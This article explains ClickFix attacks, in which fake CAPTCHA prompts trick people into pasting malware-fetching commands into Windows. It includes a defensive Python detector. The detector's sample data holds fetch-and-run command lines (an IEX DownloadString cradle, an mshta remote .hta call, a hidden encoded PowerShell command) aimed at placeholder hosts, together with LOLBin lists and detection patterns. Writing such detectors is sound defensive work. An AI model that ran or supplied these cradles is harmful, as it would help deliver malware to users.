ClickFix may be the biggest security threat your family has never heard of

Another campaign, documented by Sekoia, targets Windows users. The attackers first compromise a hotel's account on Booking.com or another online travel service. Using the reservation details stored in the compromised account, they then contact people who have pending bookings. Because the message quotes details only the hotel should know, it immediately gains the trust of many targets, who are eager to follow instructions to make sure their stay is not cancelled.

The target is eventually led to a site that presents a fake CAPTCHA prompt closely resembling the verification pages shown by Cloudflare's content delivery network. The "proof" the prompt demands to confirm that a person is at the keyboard is to copy a line of text and paste it into a Windows terminal. Doing so infects the machine with malware tracked as PureRAT.

Separately, Push Security reported a ClickFix campaign whose page "adapts to the device you're visiting from." Depending on the visitor's OS, the page delivers a payload for Windows or for macOS. Many of the Windows payloads are LOLBins, the name given to legitimate binaries already present on the system that are abused in a technique known as "living off the land." The pasted commands rely solely on native capabilities built into the operating system, such as PowerShell or mshta.exe, to fetch and run the next stage. Because no malicious file needs to be written to disk at the first step, endpoint security tools that key on dropped files have less to work with.

The commands, which are often Base64-encoded to make them unreadable to humans, are copied out of the browser's sandbox, the isolated environment in which most browsers render web content so that malicious scripts cannot reach the rest of the device. Pasting the text into a terminal executes it outside that isolation, with the full privileges of the logged-in user, and the browser's protections no longer apply. Many security tools fail to monitor clipboard-to-shell activity of this kind or to flag it as potentially malicious.
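The two preceding paragraphs describe what a defender can still see: the encoded command has to be handed to a native Windows interpreter, and that process creation is logged. As an added example (not code from the article, from Sekoia or from Push Security), the Python below scans a handful of constructed process-creation records, decodes PowerShell's `-EncodedCommand` form (Base64 of UTF-16LE text), and scores living-off-the-land signals such as a download cradle, a hidden window, a remote `.hta`, and the "I am not a robot" comment that ClickFix lures append to the pasted line. The sample records, the `example.invalid` URLs, the LOLBin list and the weights are all assumptions made for the example.

```python
"""Flag ClickFix-style commands pasted into a Windows shell.

Added example, not code from the article or the vendors it cites. Scans
constructed process-creation records of the kind an EDR or Sysmon
Event ID 1 would produce (parent image, image, command line).
"""
import base64
import binascii
import re

# Native binaries that ClickFix lures commonly abuse to fetch and run a
# payload without dropping a file first (hypothetical list for the example).
LOLBINS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe",
    "certutil.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe",
    "cscript.exe", "msiexec.exe", "bitsadmin.exe",
}

# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc).
# Requiring a long Base64 run keeps '-ep bypass' from matching.
_ENC_RE = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# Signals looked for in the raw command line plus its decoded payload.
_INDICATORS = [
    ("download_cradle", re.compile(
        r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|"
        r"invoke-webrequest|iwr|start-bitstransfer|curl|wget)\b")),
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("policy_bypass", re.compile(
        r"(?i)-e(?:xecutionpolicy|p)\s+(?:bypass|unrestricted)")),
    ("remote_hta", re.compile(r"(?i)\bmshta(?:\.exe)?\s+https?://")),
    # Trailing comment that makes the pasted line look like a CAPTCHA step.
    ("robot_lure", re.compile(r"(?i)#.*(?:not a robot|captcha|verification)")),
]
_WEIGHTS = {"encoded_command": 2, "download_cradle": 2, "remote_hta": 3,
            "robot_lure": 3, "hidden_window": 1, "policy_bypass": 1,
            "lolbin_from_shell": 1}
SUSPICIOUS_SCORE = 3


def encode_powershell(text):
    """Base64 of UTF-16LE, the form -EncodedCommand expects (used here only
    to build the constructed sample)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent/invalid."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_event(event):
    """Score one process-creation record and list the indicators hit."""
    indicators = []
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        indicators.append("encoded_command")
    text = event["cmdline"] + ("\n" + decoded if decoded else "")
    for name, pattern in _INDICATORS:
        if pattern.search(text):
            indicators.append(name)
    image = event["image"].lower()
    # The Run dialog (Win+R) starts its child directly under explorer.exe;
    # a LOLBin launched that way with any other signal deserves a look.
    if image in LOLBINS and event["parent"].lower() == "explorer.exe" and indicators:
        indicators.append("lolbin_from_shell")
    score = sum(_WEIGHTS[i] for i in indicators)
    return {"image": image, "decoded": decoded, "indicators": indicators,
            "score": score, "suspicious": score >= SUSPICIOUS_SCORE}


def scan(events):
    """Return the analysis of every record that crosses the threshold."""
    return [r for r in (analyze_event(e) for e in events) if r["suspicious"]]


# Constructed sample records; the URLs are hypothetical.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc " + encode_powershell(CRADLE)},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoP -W Hidden -c \"mshta https://example.invalid/v.hta\" "
                "# I am not a robot - reCAPTCHA Verification ID: 7421"},
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for result in scan(SAMPLE_EVENTS):
        print(result["image"], result["score"], result["indicators"])
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

The fourth record shows why a threshold matters: an administrator's scheduled script that sets the execution policy scores one point and stays below the line, while the two pasted lures score well above it. In a real deployment the records would come from Sysmon or the EDR's process telemetry rather than a list, and the regexes would need tuning against the environment's own baseline.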

The attacks also succeed because of a gap in awareness. Many people have learned over the years to be suspicious of links in emails or instant messages. In many users' minds, though, those precautions do not apply to a site that merely asks them to copy a piece of text and paste it into an unfamiliar window. When the instructions arrive in an email from a hotel they really booked, or appear at the top of Google search results, targets are easily caught off guard.

With many families gathering for holiday dinners in the coming weeks, the ClickFix scam is worth mentioning to relatives who ask for security advice. Microsoft Defender and other endpoint protection programs offer some protection against these attacks, but in some cases they can be bypassed, so awareness remains the best countermeasure for now.